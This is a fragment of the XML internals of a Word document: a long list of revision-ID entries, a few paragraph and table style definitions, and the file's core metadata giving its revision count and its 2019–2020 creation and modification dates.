    <w:rsid w:val="00E54F94"/>
    <w:rsid w:val="00E552FE"/>
    <w:rsid w:val="00E55351"/>
    <w:rsid w:val="00E569B8"/>
    <w:rsid w:val="00E603AF"/>
    <w:rsid w:val="00E6357F"/>
    <w:rsid w:val="00E64818"/>
    <w:rsid w:val="00E674F5"/>
    <w:rsid w:val="00E676B7"/>
    <w:rsid w:val="00E700DF"/>
    <w:rsid w:val="00E71441"/>
    <w:rsid w:val="00E71E2D"/>
    <w:rsid w:val="00E72FA0"/>
    <w:rsid w:val="00E75E9E"/>
    <w:rsid w:val="00E804FF"/>
    <w:rsid w:val="00E81637"/>
    <w:rsid w:val="00E84376"/>
    <w:rsid w:val="00E84E52"/>
    <w:rsid w:val="00E931DB"/>
    <w:rsid w:val="00EA4B8A"/>
    <w:rsid w:val="00EA4FFD"/>
    <w:rsid w:val="00EA71BC"/>
    <w:rsid w:val="00EB10EF"/>
    <w:rsid w:val="00EB1C90"/>
    <w:rsid w:val="00EB2EB4"/>
    <w:rsid w:val="00EB51AB"/>
    <w:rsid w:val="00EB5880"/>
    <w:rsid w:val="00EC1E26"/>
    <w:rsid w:val="00EC2C62"/>
    <w:rsid w:val="00EC35E3"/>
    <w:rsid w:val="00EC7EF6"/>
    <w:rsid w:val="00ED00F6"/>
    <w:rsid w:val="00ED0F2D"/>
    <w:rsid w:val="00ED24AD"/>
    <w:rsid w:val="00ED2DD4"/>
    <w:rsid w:val="00ED65FB"/>
    <w:rsid w:val="00ED73E3"/>
    <w:rsid w:val="00EE455E"/>
    <w:rsid w:val="00EE4CB1"/>
    <w:rsid w:val="00EF49DB"/>
    <w:rsid w:val="00EF53D9"/>
    <w:rsid w:val="00EF5F42"/>
    <w:rsid w:val="00EF7AD3"/>
    <w:rsid w:val="00EF7FAB"/>
    <w:rsid w:val="00F11D2A"/>
    <w:rsid w:val="00F11E43"/>
    <w:rsid w:val="00F1276E"/>
    <w:rsid w:val="00F16FC9"/>
    <w:rsid w:val="00F2176E"/>
    <w:rsid w:val="00F2538D"/>
    <w:rsid w:val="00F30E48"/>
    <w:rsid w:val="00F312F5"/>
    <w:rsid w:val="00F3244A"/>
    <w:rsid w:val="00F341F3"/>
    <w:rsid w:val="00F342AA"/>
    <w:rsid w:val="00F448AF"/>
    <w:rsid w:val="00F455EA"/>
    <w:rsid w:val="00F475A0"/>
    <w:rsid w:val="00F50B45"/>
    <w:rsid w:val="00F50F0C"/>
    <w:rsid w:val="00F51180"/>
    <w:rsid w:val="00F54190"/>
    <w:rsid w:val="00F66066"/>
    <w:rsid w:val="00F71C6D"/>
    <w:rsid w:val="00F72AC1"/>
    <w:rsid w:val="00F7464E"/>
    <w:rsid w:val="00F74AE2"/>
    <w:rsid w:val="00F75C2E"/>
    <w:rsid w:val="00F75DA8"/>
    <w:rsid w:val="00F76FF2"/>
    <w:rsid w:val="00F779F9"/>
    <w:rsid w:val="00F82A3F"/>
    <w:rsid w:val="00F85060"/>
    <w:rsid w:val="00F8509F"/>
    <w:rsid w:val="00F861E9"/>
    <w:rsid w:val="00F87CDE"/>
    <w:rsid w:val="00F905D9"/>
    <w:rsid w:val="00F90BEE"/>
    <w:rsid w:val="00F9269B"/>
    <w:rsid w:val="00F947E5"/>
    <w:rsid w:val="00F97EC6"/>
    <w:rsid w:val="00FA5A4D"/>
    <w:rsid w:val="00FB07B3"/>
    <w:rsid w:val="00FB1956"/>
    <w:rsid w:val="00FB6E3C"/>
    <w:rsid w:val="00FB754A"/>
    <w:rsid w:val="00FC1D53"/>
    <w:rsid w:val="00FC4894"/>
    <w:rsid w:val="00FC6658"/>
    <w:rsid w:val="00FD03D1"/>
    <w:rsid w:val="00FD0FF1"/>
    <w:rsid w:val="00FD10E8"/>
    <w:rsid w:val="00FD3F5B"/>
    <w:rsid w:val="00FD48E4"/>
    <w:rsid w:val="00FD4A17"/>
    <w:rsid w:val="00FD4C65"/>
    <w:rsid w:val="00FD5A53"/>
    <w:rsid w:val="00FD5C6B"/>
    <w:rsid w:val="00FE34EA"/>
    <w:rsid w:val="00FE504D"/>
    <w:rsid w:val="00FE5CD4"/>
    <w:rsid w:val="00FE60BB"/>
    <w:rsid w:val="00FE75FB"/>
    <w:rsid w:val="00FF1979"/>
    <w:rsid w:val="00FF2174"/>
    <w:rsid w:val="00FF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770EC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A291B820-9B5F-402A-8B99-F6422ED1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F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58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80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73E2"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="004D4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44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48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342A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34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42AB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3260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02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EC3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00902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EC3"/>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00926B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6B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6B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6B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6B8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B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B8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60F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104A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AEA25-4304-4EAD-AF75-758272029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18195</TotalTime>
  <Pages>6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lehag</cp:lastModifiedBy>
  <cp:revision>1148</cp:revision>
  <cp:lastPrinted>2019-08-27T20:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-20T21:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-03T20:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>